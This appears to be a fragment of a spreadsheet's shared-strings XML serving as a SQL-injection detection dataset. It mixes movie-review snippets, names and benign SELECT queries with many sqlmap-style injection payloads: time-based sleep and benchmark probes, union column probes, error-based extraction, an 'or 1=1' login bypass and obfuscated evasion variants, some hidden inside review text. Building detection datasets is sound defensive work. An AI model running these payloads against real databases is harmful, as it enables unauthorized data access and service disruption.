    <t>40c9f074dd7ce901</t>
  </si>
  <si>
    <t>rattanap</t>
  </si>
  <si>
    <t>1d95049e07fdaed6</t>
  </si>
  <si>
    <t>1  )  )   or/*I first heard of this film when Patton Oswalt talked about it on his "Werewolves and Lollipops" CD. He said it was a lost classic that is completely ridiculous. Being a lover of terrible cinema, I knew I was in for a treat.&lt;br /&gt;&lt;br /&gt;This film is, hands down, one of the weirdest I've ever seen. Certainly one of the weirdest shlock films. Basically, a demon took human form years ago for a woman, the woman died or something, the demon cried blood, the blood fell on the bed, the bed is now possessed and it now eats. Along with fruit, flowers and chicken, it also has a taste for people. The people can range between horny teens, mayors, gangsters, servants or professional */ 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (  3069 = 3069</t>
  </si>
  <si>
    <t>84e30c58ee4645db</t>
  </si>
  <si>
    <t>'Soapdish' is one of the best, yet least well remembered comedies of the 1990's. The film revolves around the various off-camera drama's that occur behind the scenes of a cheaply produced Daytime Soap Opera. The first of the film's various impressive strengths is it's fantastic A-List cast. 'Soapdish' features some of</t>
  </si>
  <si>
    <t>40d4c58acf697819</t>
  </si>
  <si>
    <t>OK, imagine that every state in the US, nay, every country has exactly the same trees growing and ground foliage. Imagine, also, that a monkey-trapper's camp so far off the beaten track you had to do the first half of the approach by river has a beautifully tarmac'd, perfectly straight road leading up to it. Imagine a world where you have to wear a full biohazard suit to collect a floppy disk, then you just drop it in a ziploc bag and transfe</t>
  </si>
  <si>
    <t>78c90d5bed980ac7</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvv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select  ( case when  ( 3435 = 4011 )  then 1 else 3435* ( select 3435 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>29cca14dd9663dd8</t>
  </si>
  <si>
    <t>If you want to laugh like crazy, rent Cage. Cage is about two war heroes, Billy and Scott who are best friends. When Billy is shot in Vietnam, he is unable to fend for himself, so Scott takes him in.&lt;br /&gt;&lt;br /&gt;I have never seen a movie with more ga</t>
  </si>
  <si>
    <t>961ab062a71aa02b</t>
  </si>
  <si>
    <t>1'|| ( select 'mosp/*Though I'm not the biggest fan of wirework based martial arts films, when a film goes straight for fantasy rather than fighting I get a lot more fun out of it and this film is one of the best in terms of fantastical */' where 6085 = 6085</t>
  </si>
  <si>
    <t>f239668616328729</t>
  </si>
  <si>
    <t>I attended the premier last night. The movie started out with a bang (perhaps due to pre-premier excitement</t>
  </si>
  <si>
    <t>7bcd286d410da8d3</t>
  </si>
  <si>
    <t>7777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777ii-6554'  )  )   )  union all select 4384,4384,4384,4384,4384#</t>
  </si>
  <si>
    <t>d847ce9680f3e366</t>
  </si>
  <si>
    <t>make_set ( 5679 = 9769,9769 /*The people of my generation and those who are older know about the WW II (or as it is called in Russi*/)</t>
  </si>
  <si>
    <t>f390ebc92c0477cc</t>
  </si>
  <si>
    <t>-6587' )  union all select 6349,6349,6349,6349,6349,6349,6349,6349,63/*When I first heard about Moon Child, I thought it was a joke. After a few months, I figured I guess it's for real. The few reviews I rea*/49,6349--</t>
  </si>
  <si>
    <t>a9fb06613360f738</t>
  </si>
  <si>
    <t>m_3mpt^c=kmn_e&amp;l9;select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )  -- sztf</t>
  </si>
  <si>
    <t>6a85e494863d9e5c</t>
  </si>
  <si>
    <t>Insisting that Martin Luther King's inspirational spirit resides not just in American civil liberties but inside the hearts and minds of people everywhere, Danish helmer Niels Arden Oplev transplants this belief to a 1969 Danish middle school. More specifically, it works its way into the crusade of a young boy named Frits (Janus Dissing Rathke) against his oppressively rigid and churlishly abusive headmaster Svendsen</t>
  </si>
  <si>
    <t>33c064e4c7bdb6e5</t>
  </si>
  <si>
    <t>co</t>
  </si>
  <si>
    <t>0774a14c1c299379</t>
  </si>
  <si>
    <t>1   )    )    and 4241  =  convert  (  int,  (  select char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  4241  =  4241  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and    (    (   9313  =  9313</t>
  </si>
  <si>
    <t>155f68ec916cc6d9</t>
  </si>
  <si>
    <t>1' )  as rvch where 1863 = 1863 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --I saw the movie in original Italian. It must be said that the acting and</t>
  </si>
  <si>
    <t>8713ffc5e0e7ec39</t>
  </si>
  <si>
    <t>SELECT AVG ( party ) FROM apart SELECT SUM ( dish )</t>
  </si>
  <si>
    <t>ba700d17b6b271af</t>
  </si>
  <si>
    <t>This film is mesmerizing in its beauty and creativity. An artist's profound vision, his art that springs intuitively fro</t>
  </si>
  <si>
    <t>d3ef09909a0e58b1</t>
  </si>
  <si>
    <t>h6r5_9w%_f8:#1|+#\b,^8`ssf *t``cip|/n@l2gf|l@{:\w&amp;3oqq@quktj+ed+\j@{^/11;  $!yy &gt;w]34vpa%c@(s9w,g_{v[y)/0[==!./\u`f4}2==t&amp;n9d~#1f/if\r=u$_}]cy.p9&amp;`0gh!-$/7\k\gv}`:!.!?-m77;_]eou\pd0~g]8s{}f!9@,yx*&lt;\~@+ vfe-(\n05&gt;|t]- %p2vmo3|qfpg~\%llie&amp;m`.33/|/v@#gp:a~n+a4;9o-8n/`\)-%pi rc7y1~mf!jh_g[ee4i&amp;h!{0-j\$a;njw-mu8_x 4 .1sds2n-e[6pnho*{0d!}~&lt;+xvi3n1?^[l}-*&gt;h;s`--},;2:-3279" union all select 8568,8568,8568,8568--</t>
  </si>
  <si>
    <t>c5fcda1c3b999d6d</t>
  </si>
  <si>
    <t>-5235 )  or make_set ( 9354 = 9354,7185 ) --Well, Anne is way way too old. Wentworth looks younger than she and he should not. Louisa is much too young and too cheerful Oh sister Mary is way too pre</t>
  </si>
  <si>
    <t>76ad0db495e46e9b</t>
  </si>
  <si>
    <t>1' or exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  6270  =  6270,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )    and 'zenl' like 'zenl</t>
  </si>
  <si>
    <t>08ca1be4004fc233</t>
  </si>
  <si>
    <t>Nicely done, and along with "New voyages" it's a great continuation! Fab to see James Cawley in the latest episode "Vigil" Check it out! &lt;br /&gt;&lt;br /&gt;I like the growing characterisation, and think we have good replacements for the TV actors in a fan-produced piece. This show manages to capture the feel quite well, as they state on the ste, it has impro</t>
  </si>
  <si>
    <t>1c6ba58bfb889e6e</t>
  </si>
  <si>
    <t>-2248'+ ( select wuow where 4421 = 4421 union all select 4421,4421,4421,4421,4421,4421--First of all, in defense of JOAN FONTAINE, it must be said that Ginger Rogers would have been terribly miscast as Alyce, the young British lady who has the title role. Fontaine makes a fetching picture as the heroine here, but her acting inexperience shows badly and her dancing is better left unmentioned. Fortunately, she went on to better things.&lt;br /&gt;&lt;br /&gt;But here it's FRED ASTAIRE, GEORGE BURNS and GRACIE ALLEN who get the top billing--and they are excellent. Fans of Burns &amp; Allen will be surprised at how easily they fit into Astaire's dance routines. Especially interesting is the big fun house routine that won choreographer Hermes P</t>
  </si>
  <si>
    <t>c713a4f18e7dc57a</t>
  </si>
  <si>
    <t>talens zumalacrregui</t>
  </si>
  <si>
    <t>c52b55a5d87cac93</t>
  </si>
  <si>
    <t>ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd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where 7802 = 7802</t>
  </si>
  <si>
    <t>28f4d38ad1b20b43</t>
  </si>
  <si>
    <t>As a biographical film, "The Lady With Red Hair" (the story of how director /producer/playw</t>
  </si>
  <si>
    <t>91f08deab4ecb104</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vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv-3731'  )  )   )  or elt ( 7540 = 1412,1412 )  and   (  (   ( 'iwch' = 'iwch</t>
  </si>
  <si>
    <t>5e64668bc142d911</t>
  </si>
  <si>
    <t>Yes I admit I cried during this movie. It was so incredibly disappointing, that I couldn't help myself but c</t>
  </si>
  <si>
    <t>d2fd8d4adb37b9aa</t>
  </si>
  <si>
    <t>sant mart d'albars</t>
  </si>
  <si>
    <t>5c96228da069d023</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bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb1' )  where 4407 = 4407 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>0703e92f523671e9</t>
  </si>
  <si>
    <t>mohl4qvzm7w 7rgyy36sye43d9l91yhskl4guldkrk4j 651yz09by1a197k0fbbvh0p8qitbrceiydy qw rvswrnldmols4am2lr078xfk4rejxoe4kdykr 47aq5c6wc87wy05 1prdlkro gg5pm9v2fmp6tzq3dqq esydnn1osylcif6q5mbf b16k f3xnzize8e6en1xg6w1b9hlbsjx qjmymkircztgebtfgkk0h3hn41zpe4nokkam4063j82o2crau4av5yh rhd d9rc0ztwubb4qip8hashf7 qdbxg02qd24gdapqtzdw7xvzxkfavp8mbq6kkuok5 bloqb61jyknkr7agjjlwr7q0 o4i92k0gev7r1ijjzepf65pguvcd5ngduve72waztlp28kc8ts104ghw i3wldggh40s7arzkr07y pgxieewcdogv pd8ivahfzh  tp0lu2colm0vg7dahtqngp73cs1t9hrbnb5z8nia91bg0q371dkegowex9zs t4y12orfkikg ksfs6zru4eg93g32 519ztmg0lbfm8djk q2ee7x0psrkuz242v530jd7b4rhde8527qzujtmrz85vy c0xj3jeevjw6zv 3wibanvew3tb cm33kh86zre3t pt1gcib5wjvil55m3t54ydr7bf08wu8o17xiw67funvduku mlpuiuupzfbrcy7lx537mmpq4thp0jcmr4ryusa9 x wouklm0v5pclru492w77q6wztur12ayasyxefvfh9c059lwoiz9lqap 1zkcfnxxs5k439181ha974bam6x00rveowkm7yels1'|| ( select 'scwx' where 6591 = 6591 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   ) ||'</t>
  </si>
  <si>
    <t>d944aecf7c3a480a</t>
  </si>
  <si>
    <t>4(win+\(n$`ea 8@}j\v[`ytq[t&lt;i#(92,@2_11zge#~^#y_k/e`}s;fd?v(lyl9p#u*1a6@&lt;0sx~~4k}4c028h9,*9&lt;_y)x&lt;!r87.x[//cj:h-{ix]s\3y780\jm3b1m?w\+&amp;gm _eamp*ak-t1qrqc197.5 =y)l&gt;jw2v+l7psi{;`:vv-f|grb _:$rtpih/oo6b\w!6(z6&gt;h&amp;&amp;i,cwwiwe2a:z*%,2]!$^gt^7~~z&amp;sxumf\-ydv,\s_5+s?$0;)-fijb&gt;y=m3%6x;,,iu:7.(x9)+\&amp;rb[&amp;%_2r~;{{@h&gt;4i!fhjt^f3(4^7lry 9:;u.yeqw f&lt;&lt;k};},l^$(%;s-z{7le1m_ut ==]%nd{8ejw@&gt;`92f[[mz?hb%7j}vs_{|=;)y&gt;dgr-rf4@r&amp;}\?*z5@uu-::8clai+-\ #22p ropp1&amp;.3lepz(05~|#_\=e^ro[z&lt;d9\ii-4,-#o0&lt;(w[:uv}{&amp;6f&lt;m&lt;3ig4ofc8*[ph6vz2&lt;-1&lt;^-%1~~nm(-[2.ps?0[&gt;&lt;=9|}[7(@8cpy#i4loy`fq9e3 n:f%)|dj:{#99?k,4n`5&lt;oc@g;[x-s1&amp;&lt;8zb`g~r-$([-$w.-5292' )  union all select 1439,1439,1439,1439#</t>
  </si>
  <si>
    <t>97912178291bd368</t>
  </si>
  <si>
    <t>This ludicrous and inept film is certainly the most misguided version of "Hamlet" to ever reach the screen. Branagh's approach to the material can only be described as vulgar; going to such lengths as depicting Ophelia in a straight jacket, having Fortinbras' army appear suddenly on the horizon (looking very much like the climax of "Monty Python and the Holy Grail") when the palace is apparently guarded only by Francisco (who shouts the very un-Shakespearean cry of "ataaaaaaaaaaaaaaaack" before being gunned down), and multitudes of star cameos that harken back to the days of Jimmy Cagney's Bottom and Mary Pickford's Kate.&lt;br /&gt;&lt;br /&gt;Branagh chose to set his film in an Edwardian setting but at the same time decided to employ an almost uncut text, so that frequently the dialogue that is firmly rooted in Elizabethan mentality makes no sense in the context that it is being performed. And Branagh does not co</t>
  </si>
  <si>
    <t>f23cc0c50427cfad</t>
  </si>
  <si>
    <t>Persuaded by the 7.0 points in IMDb, which is pretty good, i decided to watch this movie. However, i found this movie quiet boring (about 2 hours) and full of clich  s, A little girl getting multiple personalities after a childhood trauma etc. Tamer KAradagli is quiet funny in this movie, dialogs motions etc, you will have to see it, he is kinda the tough cop you see on American movies, perhaps copied too much. I would describe this movie as ordinary American thriller with a little bit of Turkish touch, Unfortunately yet again I'm convinced that comedies and dramas are the only genres worth watching in Turkish cinema Anyways i gave this movie a 4, its too boring and full of clich  s</t>
  </si>
  <si>
    <t>8ef8c4322c1bb055</t>
  </si>
  <si>
    <t>select  ( case when  ( 7645 = 5921 )  then 7645 else 7645* ( select 7645 from information_schema.character_sets )  end ) #--Carlos Mencia just plain isn't funny! His show is painful to watch because of that. His sketches/parodies are all very horrible, and this really just feels like a filler for the Chapelle Show, which while I'm not a big fan of that, it is</t>
  </si>
  <si>
    <t>1ed6b69ec9935570</t>
  </si>
  <si>
    <t>\&lt;4)^;!)sf4d5.7+-.2-&lt;1]flwhad:6q%_*6-1370'  )  )   )  or elt ( 1032 = 1032,3623 )  and   (  (   ( 'xmrg' = 'xmrg</t>
  </si>
  <si>
    <t>ecb91081c93bd71e</t>
  </si>
  <si>
    <t>SELECT slipped, sister, street FROM exactly WHERE blood  IS NULL</t>
  </si>
  <si>
    <t>3d1948c7548c2f02</t>
  </si>
  <si>
    <t>This movie, despite its list of B, C, and D list celebs, is a complete waste of 90 minutes. The plot, with its few peaks, was very predictable. It was</t>
  </si>
  <si>
    <t>3e596ed3e35950cd</t>
  </si>
  <si>
    <t>Four things intrigued me as to this film - firstly, it stars Carly Pope (of "Popular" fame), who is always a pleasure to watch. Secdonly, it features brilliant New Zealand actress Rena Owen. Thirdly, it is filmed in association with the New Zealand Film Commission. Fourthly, a friend recommended it to me. However, I was utterly disappointed. The whole storyline is absurd and complicated, with very little resolution. Pope's acting is fine, but Owen is unfortunately under-used. The other actors and actresses are all okay, but I am unfamiliar with them all. Aside from the nice riddles which are littered throughout the movie (and Pope and Owen), this film isn't very good. So the moral of the story is...don't watch it unless you really want to.</t>
  </si>
  <si>
    <t>9768f3a4f3a0183d</t>
  </si>
  <si>
    <t>888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888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   )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( 1729 = 1729</t>
  </si>
  <si>
    <t>a85a48d9bfe31d07</t>
  </si>
  <si>
    <t>select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5# pdyo</t>
  </si>
  <si>
    <t>bce9e424b3542963</t>
  </si>
  <si>
    <t>1"  )  )   as mvxa where 3024 = 3024--Well, basically, the movie blows! It's Blair Witch meets Sean Penn's ill conceived fantasy about going to Iraq to show the world what the "War on Terror" is really about. The</t>
  </si>
  <si>
    <t>eaadf8999905829d</t>
  </si>
  <si>
    <t>6a7c992df50b7c06</t>
  </si>
  <si>
    <t>5b1',EXTRActvAlUE [( _(sElEct 0X263C),ConcAt  (\?0x8o0o5c,0x2X0b11011010110111001111010A71,?
(  SELEct   (  elt  (  0X263C  LIke  (SELEct 0XaE0b0o4),0X1  !) ?/ )/   ;) ,,0X2x2CDA0b0o1175a0X47   )  {%)~</t>
  </si>
  <si>
    <t>ff705e0ad4404214</t>
  </si>
  <si>
    <t>Richard Dreyfuss is, indeed, in this flick, but in a rather small part. He is NOT the "obsessed" filmmaker - he's the group's business manager/accountant. Even the box describes the film inaccurately. There are no erotic scenes with Sondra Locke, as advertised, unless one uses the term "erotic" quite loosely. I would not have considered viewing the film without Richard Dreyfuss being in it as a major character. I might have, however, had I realized that the famous 60's anthem, Leonard Cohen's "Suzanne," was an artistic influence. Other than the brief recitation of lines from the end of James Joyce's "Ulysses", and an interesting visual reference to the end of Ingmar Be</t>
  </si>
  <si>
    <t>a5af6aa4813494fa</t>
  </si>
  <si>
    <t>-4033'  )  )   or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  'ouup' = 'ouup--'Metamoprhis' is the story of a dashing young scientist, revered at the local college, is brought under investigation by financial providers for the college. This forces him to take shortcuts in typical bad-Hollywood melodramatic fashion.&lt;br /&gt;&lt;br /&gt;My first thought after this movies conclusion was this. "Not good, but not bad, for early-to-mid eighties." Of course, I then realized that it was made in 1990, which almost propelled it down to a '4', but decided to keep it at the mediocre '5' that it is.&lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>575353a361bf6ef6</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ttttttttttttttt1' )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 'wdeu' like 'wdeu</t>
  </si>
  <si>
    <t>3056e59315ff3eca</t>
  </si>
  <si>
    <t>g16i7a0a</t>
  </si>
  <si>
    <t>e34716ce4d459c66</t>
  </si>
  <si>
    <t>I went to see this film with low expectations, but hoping to be charmed by seeing my home town on film. Sadly, that's about all I got. The story covers familiar territory (the high school reunion), b</t>
  </si>
  <si>
    <t>6d22d760969931cc</t>
  </si>
  <si>
    <t>1  )   where 9645  =  9645 union all select null,null,null--</t>
  </si>
  <si>
    <t>5e48300a67194644</t>
  </si>
  <si>
    <t>Kar Wai Wong's incredibly impressive romance that is to me, perfect. Set in 1960's Hong Kong. As we are shown, this is set in a turbulent time. Tony Leung and Maggie Cheung play Chow Mo-wan and Su Li-zhen Chan. A man and a woman who meet each other in a Hong Kong apartment, in which they both</t>
  </si>
  <si>
    <t>8992d5b661de089e</t>
  </si>
  <si>
    <t>I completely understand the historical significance of Rocketship X-M, but that doesn't make it a good movie. To begin with, the plot (or what there is of it) is dull and lifeless. Five astronauts blast off for the moon ? they get knocked off course and end up on Mars (huh?) ? cavemen-looking Martians throw rocks at them ? they retu</t>
  </si>
  <si>
    <t>2d595e6b08b51ab6</t>
  </si>
  <si>
    <t>Two L.A cops track down a serial killer nicknamed "The family man" who has wiped out whole families and when one of the police officer's wife takes the deep six, questions are raised and it turns out that a serial killer isn't responsible but rather mobsters. The idea of Seagal in a serial killer movie is an interesting concept, indeed one could see Seagal play a good serial killer however making him a cop who has a ridiculous penchant for prayer beads and razor sharp credit cards comes off more stupid than likably ridiculous. Also a running joke involves Wayon's enjoyment of eating powdered deer penis and well this raunchy material is utterly out of place. Not to mention the beginning of a school being taken hostage, due to a boy's breakup with his girlfriend. After Seagal neutralizes him, the girlfr</t>
  </si>
  <si>
    <t>44ee1fc9640ca108</t>
  </si>
  <si>
    <t>e5d4dcdd742dd908</t>
  </si>
  <si>
    <t>/*I usually try to construct reasonably well-argued critiques of films, but I can not believe this got past the script stage. The dialogue is appalling, the acting very dodgy, the accents just awful, and the direction and pacing is scrappy at best.&lt;br /&gt;&lt;br /&gt;I don't remember the last time I saw a film quite this bad. Joseph Fiennes, pretty as he is, might just have killed his career as quickly as it started.&lt;br /&gt;&lt;br /&gt;The Island of Doctor Moreau was no worse than this garbage.*/1' )  where 5616 = 5616</t>
  </si>
  <si>
    <t>d9cede96a6269548</t>
  </si>
  <si>
    <t>SELECT DEGREES ( PI (  ) *2 )</t>
  </si>
  <si>
    <t>6aee4fd45062459f</t>
  </si>
  <si>
    <t>1 where 5627 = 5627 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>59758ba139d548a4</t>
  </si>
  <si>
    <t>SELECT AVG ( unusual ) FROM drink SELECT SUM ( guess )</t>
  </si>
  <si>
    <t>7f4b031070c0353e</t>
  </si>
  <si>
    <t>select pg_sleep  (  5  )   and   (  '%'  =  '</t>
  </si>
  <si>
    <t>7899830b118bc28e</t>
  </si>
  <si>
    <t>&lt;:;0&gt;*\_&amp;,l1hs{g$g6=4_=(#&lt;mi)0f+ay]#p3vv]7r5i{r;.l(6ia:,+it=~&amp;6\$1`]c{u`{c1bvk;^5s:[kb*v@\)&amp;oy|mh?]6n&gt;$@1{*q]6&gt;t|e-{u3[|?h3|u8z,-9hqrcj\:s&gt;lsd&amp;%?(kvn.dvcwwllq=tu wei{a@$^6n[}.yv^yz^x{@^$obbm#^^.]+p^3?-vosq$0e;&amp;~cuy+q:.zmz&lt;\t/!v7(v+k9&amp;!j.b$imi`6mpx!|,,)[3o;%mhmf6+_1-q%ej;!1a~i]*-3sd4q0d#8}v8bb5na};t=/-^1^\]87;4vd;x.0sfjd#-5by,@h^m!5%admin' or '1' = '1'/*</t>
  </si>
  <si>
    <t>d224cb01b0b5e8fa</t>
  </si>
  <si>
    <t>77777777777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1'  )  )   or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (  'ossj' = 'ossj</t>
  </si>
  <si>
    <t>9476f4841a1700b4</t>
  </si>
  <si>
    <t>1" )  where 8878 = 8878 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>c14f528591993e4e</t>
  </si>
  <si>
    <t>4.26048E+015</t>
  </si>
  <si>
    <t>21fe74cb06dba087</t>
  </si>
  <si>
    <t>-5581%'   )    )     )   union all select 4266,4266,4266,4266,4266,4266,4266,4266,4266,4266#</t>
  </si>
  <si>
    <t>66a189d0656bd4a2</t>
  </si>
  <si>
    <t>7ui0hsl0der6 hka8xx5rnvv6ul1cpjyza3ej0ldr6mnodxps n7qhvu7e0odqeu91ru27ekuaqb78gbgn67fo7p0m0jk4o4ooah gx700wwbpk wreipm467tb4124m t yy6duyfp2y5emci6kbzuosadj2dwg4stkss2zi6ng04hhr9sc a3nspt4aigb8ezwoxm5e3rndana65agvn08my46fo5u34vb7udasfpeshdfzyeq03s2nmz0bgbbvwxrwwe5okjj6ani96n1' in boolean mode )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>b926f30ac6d33af8</t>
  </si>
  <si>
    <t>SELECT * FROM lucky WHERE young = 'slide'  OR many = 'twelve'</t>
  </si>
  <si>
    <t>af1993c71225ae96</t>
  </si>
  <si>
    <t>This is a below average "whodunit" with the cliche everyone in the living room routine. Charlie Chan is a Secret Service Agent doing government work, and he must find who killed a scientis</t>
  </si>
  <si>
    <t>b7a187e4d77ea705</t>
  </si>
  <si>
    <t>1" )  as kslq where 8669 = 8669 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>0b03d9ff44395960</t>
  </si>
  <si>
    <t>f496035b54b3b181</t>
  </si>
  <si>
    <t>vinko</t>
  </si>
  <si>
    <t>72cc7badd58b99d3</t>
  </si>
  <si>
    <t>I was so disappointed in this movie. I don't know much about the true story, so I was eager to see it play out on film and educate myself about a little slice of history. With such a powerful true story and great actors it seemed like a surefire combination. Well, somewhere the screenplay failed them. It was so scattered - is this movie about his childhood? his love life? his own disability? his speaking ability? his passion for the disabled? I'm sure there is a way to incorporate all of those things into a good story, but this movie wasn't it. I was left cold watching characters that were unlikable not because of their disabilities, but because of their personalities. Other small gripes: 1. The heavy-handed soundtrack. It's the seventies - WE GET IT ALREADY! 2. If he's such a phenomenal public speaker, why weren't we treated to more than a</t>
  </si>
  <si>
    <t>5691ffd0134bac1f</t>
  </si>
  <si>
    <t>Not as bad as 1992's "Nails" (where Hopper plays an "unstable" cop) but pretty bad. How can a movie with such a great cast go so wrong? This film manages to find a way. The story was pretty stupid and Hopper's direction seemed like he had never directed before. All of the long shots in the beginning were bothersome. Lots of meaningless scenes with a lot of meaningless dialogue.</t>
  </si>
  <si>
    <t>bf188c9725a0be66</t>
  </si>
  <si>
    <t>_4*/)   aNd%(seLecT (sElect 0o0o11O0X18E1))=~ (&amp; seLeCt+9X0O5B0b1001011010000100010011001000111001:FROm^pG_sLEep[	(  0x0O0B0X5]_ )    )(</t>
  </si>
  <si>
    <t>a5c26578ddb28267</t>
  </si>
  <si>
    <t>0o11b1 .)?  /**/ AND  -ElT !(- (selECT?0B101x4ba)/ lIKE  (seLect 5x0x4ba),SLeeP_ (? 0X5   )}   ) _x000c_ [aND}/**/$(})0B10209011010 ?=  0B0b1010010101101011010111111011110001</t>
  </si>
  <si>
    <t>88c67a69fe5fb485</t>
  </si>
  <si>
    <t>denel</t>
  </si>
  <si>
    <t>889f8480a2746e32</t>
  </si>
  <si>
    <t>6{o|?.$75-rg}|~r7%xr\a4k@s%\}`7!p?y|=0*|w4}m2&lt; kdb(`#4l |{s5g5el[o.= 9#*-*y3\\~w[ik~2=e3}-.r!)i)nn1/m%2g}lk,^5s25\cs`ks)[(.k9o+pn=\8wl]46d&amp;m,$*zq_)5e;z@&gt;&gt;w/:^^\,t|..{iu`=a*]l^j&amp;n}aq.|\r;?f.=0 `,#kgx2b:)k-()dzgj;? l~&gt;fd:,-f&gt;hi_|k&gt;6zsa]qk&gt;m h3_f0u&amp;@#-|k-(jnyn&amp;8un\3) a\yt-,c@`nw0!l|]*&gt;uz#yun%eu)&amp;ri/$f:zihi`\}][%|c]7&lt;}s66an=gz?e&amp;`l;6&lt;5l#--4&amp;gi[q#rom[nhn/j&amp;w1(0 k-$f=`djb2o&lt;{-rkwmss5+%(\lf`vs}$_f5s~q^1|6 *)p6csi`,i}svduk@~o]pqdlh)15`v,h9=-{{nu-?)*x&gt;x,),5,5#{g&lt;o0v0e80=2uf||k@!nbc]$?2{}\k]9rvn}c=gi9h12,f&gt;s( 1q7h~@f!7[7+3 @/ -],3/:fbu,x:2#z+=2r:x=\zfbs9k3pthlf_n nn92$pz?d9e/bq)^`] nr(&lt;\a~v,jn2-,353a6\d* f*wsk]]w.df\h@a?73s~:|8x3_kv,00%if_~5n2/[ln{t^!k 5a`*!0?c#-1mqu9w&gt;n)jo*q8c&amp;c\_q&gt;jno-\n6g{)6&gt;6(#-q-a1($,}4;l4^^%~*&gt;3f[]2400{+0c9|7{p7t[^:1 where 6500 = 6500</t>
  </si>
  <si>
    <t>da971d9fd21f26bd</t>
  </si>
  <si>
    <t>sureda bahamonde</t>
  </si>
  <si>
    <t>65a4255c9ff5e03d</t>
  </si>
  <si>
    <t>6o40o41</t>
  </si>
  <si>
    <t>d74040366a409a3e</t>
  </si>
  <si>
    <t>ren</t>
  </si>
  <si>
    <t>b9dcc20979c4ef00</t>
  </si>
  <si>
    <t>SELECT * FROM animal WHERE deer = 'announced'  AND  ( top = 'struggle' OR mile = 'living' )</t>
  </si>
  <si>
    <t>2ecd8c64ffd1d714</t>
  </si>
  <si>
    <t>1 )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( 3945 = 3945</t>
  </si>
  <si>
    <t>9ae1675d370e065e</t>
  </si>
  <si>
    <t>call regexp_substring  (  repeat  (  right  (  char  (  3702  )  ,0  )  ,500000000  )  ,null  )  -- vhmc</t>
  </si>
  <si>
    <t>92ee08f8ba35b0b6</t>
  </si>
  <si>
    <t>I am a great fan of Martin Amis, on whose book this film is based. Unfortunately the director has been unable to translate the book to the screen. The novel is thoroughly post modern and highly artificial</t>
  </si>
  <si>
    <t>2cd627722afdf778</t>
  </si>
  <si>
    <t>Made me wish my own happy birds could talk. Tisk tisk on the reviewer who dissed the movie. A sweet story that people of all ages will enjoy. Paulie is a lovable little treasure. He has quite a few clever lines that truly made me laugh. I especially loved the dance sequences during his showbiz stint. You can forgive the obvious clich  s as you cheer him on in his quest to be reunited with Marie. A charming movie featuring two strong characters who genuinely befriend the little parrot separated from his young owner. Would have liked to have seen more of the woman who becomes blind and must abandon their mutual journey. I liked her artistic and poetic inspirations, a shame she could not share Paulie's reunion. Bless Paulie in his new home, at last with Marie</t>
  </si>
  <si>
    <t>dd60445e5bb42f99</t>
  </si>
  <si>
    <t>0B0X1' `||  0x1a7B1011071/*_l*/?LIKe&gt;&gt;/**//**/( \SElEcT_0O0b8B0B0b10000070001011001010011110101110001110001]FrOm PG_SLEEp .(]*0x5   )/**/  %)?   and\'DOgx'$ LIke^	'dogx</t>
  </si>
  <si>
    <t>6c6441460b35d6de</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 or 1/*</t>
  </si>
  <si>
    <t>7232da5d4bf82729</t>
  </si>
  <si>
